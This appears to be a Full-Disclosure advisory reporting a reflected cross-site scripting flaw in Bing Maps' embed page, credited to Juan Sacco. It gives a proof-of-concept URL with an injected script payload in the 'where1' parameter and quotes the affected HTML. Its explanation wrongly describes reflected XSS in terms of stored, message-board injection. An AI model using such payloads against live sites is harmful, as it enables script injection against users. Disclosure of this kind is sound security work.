Information -------------------- Name : XSS Reflected on BING.COM Software : BING.COM MAPS Vendor Homepage : http://www.bing.com Vulnerability Type : XSS Reflected Severity : Very High Researcher : Juan Sacco (runlvl) <jsacco [at] insecurityresearch [dot] com>
Description ------------------ BING.COM is prone to a XSS vulnerability because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the victim's browser. Details ------------------- The reflected XSS vulnerability is a variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is exectued by the browser, and then displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read Exploit example as follow ----------------------------- http://www.bing.com/maps/embed/Customize.aspx ?v=2 &cp=-34.59999847400003~-58.45000076200001 &lvl=6 &dir=0 &sty=c &eo= &where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//</SCRIPT> &form=LMLTEW The vulnerability is caused by the following code and affected by the Generate Code map <div id="LME_mapLinks" style="line-height: 20px"> <a id="LME_largerMap" //-->">'> on Bing Maps (New window)">View Larger Map</a> </div> Solution ------------------- No patch are available at this time. Credits ------------------- Manual discovered by Insecurity Research Labs Juan Sacco (runlvl) - http://www.insecurityresearch.com -- _________________________________________________ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/